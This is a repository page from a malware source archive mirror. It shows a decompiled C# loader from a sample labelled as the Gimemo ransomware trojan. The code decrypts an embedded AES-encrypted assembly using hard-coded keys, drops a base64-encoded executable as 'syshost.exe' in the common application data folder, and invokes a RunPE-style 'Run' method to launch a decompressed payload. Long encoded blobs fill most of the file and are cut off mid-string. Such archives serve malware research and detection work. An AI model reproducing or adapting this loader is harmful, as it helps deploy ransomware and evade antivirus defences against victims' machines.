ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/SysDriver/Driver.cs

96 lines
504 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: SysDriver.Driver
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using SevenZip.Compression.LZMA;
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;
namespace SysDriver
{
internal class Driver
{
private static void Main(string[] args)
{
Assembly Qg34ZxHj9k6A = Assembly.Load(Driver.Zi26PdQw3y5C8BkWa4(Driver.Cz8k6E9Ksp7JPx4f3T2YeRo("temp.resource"), "n7L4EeAi9x8HRk2m3SK", "Cq85Gab9ZDo27KyYm46W", "SHA1", 2, "Fi82MrGb94Kej7P6", 128));
string path = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + "\\syshost.exe";
byte[] numArray = SevenZipHelper.Decompress(Driver.Zi26PdQw3y5C8BkWa4("0/NXU3n8Yj/J5LQNkrqshzJoWBj2sG8n0Yz9UYMHVSEAoJCsYJS0CKtLFs0Qo4VTOVQV5bE0Mn+HonmcWU0kgP+47RUhaty8HaqORgE4grPvDPWZK3lATRxLnLgwkV/tukGt/i9JQrPtdgkUzh7fUV0xOepG7jk3F9xsEE/dfdDC8l1Sp0IdEwTZesHBG9VHGqrczT1XozyOyfechaYQ+OoOdf5FoBcvfN9aCFdUQqZsQOWIyqOXFp7U3ZmH3jjvcD78antShu2vt8EQJEN8IRsnHhsj13x+sCN6woL2SHq5MQ61ivQz3bT+WgLvb3gZKMPr47GiYejKPAQHICX+eKniSNNE1X95IXQd/ycbuhgzrGK9yAODLKhirjpYmId4l1ORu6cxcjLIysCZSqWpPN2ysSJGhUUH+nY9xlzSyX4uBN5AsYyx9DyrzQGpo0GK92MjxEKUmsfeVPkd/C3QN4DfQ+mWYLUASFuq98W/Gn5YrGugQ7Hnr+WmrmkBEv6lkio6VMK8A4nu5o2iG1WaWy9dKGuUnqWZKcBfhvaGPjumQ8y8PRtlPVrMJLrtagwxNs3zV6ZQxxto3992D438+wXpRvTe98H8g9E3WyqNO4Wpwgaqa77PfMUvN9HsN4q4Hb+kY/HF621Ar8vP7uT3KoWgo3rflM7mR5luq7oNYcbz22ei2x8I8qSdtpXkk2KBhb+oDs1FpPWCBee509CaKwXuh39muKyqWpQbssVhf5HFav+QvSmXu1ePaMLyR8c8m1J0on9ydLgr0fJkKEcMWhYgJmhhUmM7n6BGV+WXbzYvM4AfmF43/ilFaca6L/WETVjSXUll6az9EsQcBmSLs7MESgnAYzyGCuBy5rPw1X56ZXRVSHKjrrsfbmJDw38LOda7NxfMNyjmfrOqcx/ENFhUWCvvIzJRYQu7biQPnGi0Wpx/tC0JYWYxwf1zgztF0rQbuxnrCUdbTVqqZ+P/uTnvRNirpBmjMyftnx0HoUtPMfoSzI9P7ON/KSuQrcLyS9RjYyxDPLlpjJDFif3LHNZAsaAW3T2WplhK8CF7YezLmO/+bM9zTKh5Bbu+Eki+IbD3o01MLv4rpOQtrBIvaNYSdwlP076/TQ4qQ/gdhBVKIIqTlXdX5n7j1HgnTYfg5yUf7oddM836psl3iZA6iFs2ggciP31QHJ10QjXK2I8FqnIfN7qJp6NqhEKZHNQWRuk/hKP0TbeKUTSYDjlB7GeYR1GKUCA+v1x+tbC6L/tjIQqB34hJwsMIxG8cZ/a0e3dWSbagMxOCOukEoCeXfwiDPzq4s+fSWhgvvSwBSi7QyIrDk2La55nwcKxUvCN98o9MGOfXYgHaszn+n99A/uEy5ggKMG8LFmhhX3PclM2HarAAz3Lj0tDGL5TM4iu1/Z39XL5sdZ6+RoKCcjN8RzJ6RIzCVjdVQwoRL9gtPfnwpBi/aXeLEFxOs3jJv+ZqthNASLSVqHJVOh4ORppox6SvQCqk9EC6ieAGe4iqyFJluwladhkeV6q1wkLTpWL0NMQJmd5vDaAQ9QHuFhm5ybg6zyWM1Sst8tjtFPEotRAYbEiLdcAlPEqCFlIq8ExoD2R7dHTVzd15Mw04rTsFmO4ZJ7CB8Mkoi9onPlWalUVvmh0B2gcbD9dwCM3yTeaqRHHATb3pY7WCLyrrrqHOnlfhIeHx8q+4wMqUzL5lz5mg5Vkxgj5kRADLFkMUlCuoWAD+bzqggbUMUkCo+3gtCPrmp58vBE/iqH6fH6bYbi0khwICkvB1kv9Rajj2w9i/QLOSVFoY3B8NP3X5ugo1M07ZkXoDtH7vLZ9gn4nhX8JO+f89dIghzqOYik9tQDDulP6lFLqIMRfPAX5CigsZE/p7+mh+aIxCiQE0ajRqE62YQCMo8Yp/vj4BkoUDK9j+66uG9TARJ2ODe9WsnVLCiSvYWzQocQskEjE8C5VSoP69SS/eYerASx941kw6V+f4m5OXSkCrbZV+yRvVYznGY1GcwPMfbnKKDKvMBSMKcfAAovOwtDdF4JEIJMQTNjmAy7KPZImJ8QJ8PkKaRC141TWsj5mkWjZ8sw2GPgELuz9D0ZWgBBPG37iJ1e+sktLIpTRXNG8DRZ16HugohKHM6IVvcPfy+R5t7+L1VBv1d2M704KUvm8hzL+kW9za3rNxtU9gn4PN5ZbmZRB3B4u8SejWtdfxGO1gchd29HiQziPdvE0f64CkT9WPzHhHIFh8BIytyawosgYEvkOBj3GhcNdUqO1TZXTr8/xlKrviIiIjiPA49pCS6DrgzvmydRbtNhUiaEyy5cvEt3JAuSI+7n+TuAGNSsFO3g24cNk/Lz5JYwauajegBUU9t4WjikGe7QKqphL+vKNjPvEAKP0OXd0qAG3bKZNTeECl7Y9qyJhmL3JM1lqq5YgPVX/IQEomQtoyH3rC49FcIr4h+GYAlURi10im/5yBAJ0wPcvJl+zr8ZiLDJFbwTh1/IJWVOqN64xbnvrmSlivDocoIhBgAmCkPOLF9fck2XeSdCZw7arIXn+UVWexF1//58PTn5+XA9EjG7XplfpI4vst4QvoxkjxTDFErnGjZo6HxgwxCIC66ww7Ki+jyINN6y0VVJEoa97gD7egAP92rDrGg6fKcWefu7KtQvW1UiOG5XpOUKquGZfSPuwu6JJCCioi7RxJsIiSAh9jzOKtZEgXadn/a1xv81+JEeKHxHj5lV4UCkYCmc1XLnrISrrhENz4yyebWQny9kJsoXZIpc1nF7ZFuXuMzQFRf5Atx31jNV3QcpydOZiDkJXjC+6BPrh8PGPPwcWoRe6kZGdMhIbrUYzSV4Ytt46uu4A5SU/2yhqd5gL/XUWGnicmboSQSk4hr4urBa/roCwGFxBKKJkDG7wkOik7S93A2zazKqio16I88qfpCnWBhHJE39oAuajVvV7Z9eni+isi8801Qz+u7djsEV/32j8IQDTkbEFZDCOBxlnE/JmXx1rxSobjqDlaAygelbcaw+8msJUtpldFdD9dz49sxyUv4GIi2TMqMjHX+XAH93CPNxa1AYzq1/KYIUR/gsjKHclIbzQ0bJ6mw3EoWuUdYq9GmVSNc/YeaHHbBi5u7PctAwuXYjiHRKyvJV3up06F51Lg1U8YCj8Sn0i+da2q6peaHbKmLelp5WzDT3ow7M4tZoeDgNWyDh0apii716oqdhsEaKeECDNEDcjlU31X8ao5j86sXGFloZNfaWWKM2sv68sNKQJoX/EkcRl2UpgSLjQWHf3FyU9bcjZthkA12ZjRHr607FbC5Am1jD2ug6NbKUJ9Ir62I+6VWxAD1mp3leSM8qHlT48PieMdF9cwTBvuINYYe+qlxqBdwQjY5uqV3jYQjAvAqhJ22qkaosNkt6fKLgL6TbwqarjfX/YbFjBjhlrddqwg7z6meRvth5I1tgoh6G1bEFXwBTgMtFAhavqgtE9oltrasEJWB+206Wpsz7/grEwPP+pAWM3Jh3XHZpI49ZK5QL/M6AJAwWc5n9xiurM2CAWkqNIf2Cfck8NjP3iGm7fYZS2k99Nf39xHANPRX2mpPnh6wwNSu560I1f3pu8bCJCZTwwBiD28UETdPw2WzXK0XpEcJwU49WwsXFtPyzkqqYJAADH7EgavDhiyxxt42WqZnI9/+ehdFUEqp+kvJ4qFeDeFzrGXtVuRhVmsA/NMF61yndgFHq3tXUwRtpa9KB3yn/tdZsUvoXXfoLgZPK61gEZ20qX2iaE34zBE7zHp6ch09gSDj4zyt1NMkmxIU6QtlV8yWMLTDZxZnK8N2ueYkIQ5i7nPXf/OALRZd2zOMyYcfbVBygqVjy3WX0rhiONy2R657XqQkRO0GuzNC51X5cH2vMqXMzZBOuNZYGGjzIqtBPG5F9InQlUsLjU38Z8AF/V6hMSHn0iLd2ltqRSw7Cmmj7NjgQxJ++/k7doLYPKAHWagxCZr1EmwWF2+NzaLen7+gBZRAeVmp/bH1jgKHg0ixIVV8aBYEb
File.WriteAllBytes(path, Convert.FromBase64String("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
Driver.i5P4RpZk3o8Y2("RPEMETHOD", "Run", Qg34ZxHj9k6A, new object[2]
{
(object) numArray,
(object) path
});
}
private static string Cz8k6E9Ksp7JPx4f3T2YeRo(string c4H9Nng6M3Gpx) => new StreamReader(Assembly.GetExecutingAssembly().GetManifestResourceStream("temp.resource")).ReadToEnd();
private static bool i5P4RpZk3o8Y2(
string No8p6FSg43Qzy7W9JjCx2n5AM,
string Ec8d7KPw94NsCo56HqSb3p2MTy83,
Assembly Qg34ZxHj9k6A,
object[] Ge23YfFi7g9MBa4d6S)
{
try
{
Type type = Qg34ZxHj9k6A.GetType(No8p6FSg43Qzy7W9JjCx2n5AM);
if ((object) type != null)
{
MethodInfo method = type.GetMethod(Ec8d7KPw94NsCo56HqSb3p2MTy83);
if ((object) method != null)
return (bool) method.Invoke((object) null, Ge23YfFi7g9MBa4d6S);
}
}
catch
{
return false;
}
return false;
}
public static byte[] Zi26PdQw3y5C8BkWa4(
string Cz8k6E9Ksp7JPx4f3T2YeRo,
string Ps97ZcYt82Rdm4N6TgXo,
string e6N5Rfb4Q8Pqw3EK,
string i5P4RpZk3o8Y2,
int c4H9Nng6M3Gpx,
string Gf98Wrb4R7Qyd3Z6Kqg2LCp53T,
int Ds56Zrz4FBb92YxWm3)
{
try
{
byte[] bytes1 = Encoding.ASCII.GetBytes(Gf98Wrb4R7Qyd3Z6Kqg2LCp53T);
byte[] bytes2 = Encoding.ASCII.GetBytes(e6N5Rfb4Q8Pqw3EK);
byte[] buffer = Convert.FromBase64String(Cz8k6E9Ksp7JPx4f3T2YeRo);
byte[] bytes3 = new PasswordDeriveBytes(Ps97ZcYt82Rdm4N6TgXo, bytes2, i5P4RpZk3o8Y2, c4H9Nng6M3Gpx).GetBytes(Ds56Zrz4FBb92YxWm3 / 8);
RijndaelManaged rijndaelManaged = new RijndaelManaged();
rijndaelManaged.Mode = CipherMode.CBC;
byte[] numArray = new byte[buffer.Length];
int count = 0;
using (ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor(bytes3, bytes1))
{
using (MemoryStream memoryStream = new MemoryStream(buffer))
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, decryptor, CryptoStreamMode.Read))
{
count = cryptoStream.Read(numArray, 0, numArray.Length);
memoryStream.Close();
cryptoStream.Close();
}
}
}
return Convert.FromBase64String(Encoding.UTF8.GetString(numArray, 0, count));
}
catch
{
return (byte[]) null;
}
}
}
}
Reference in New Issue Copy Permalink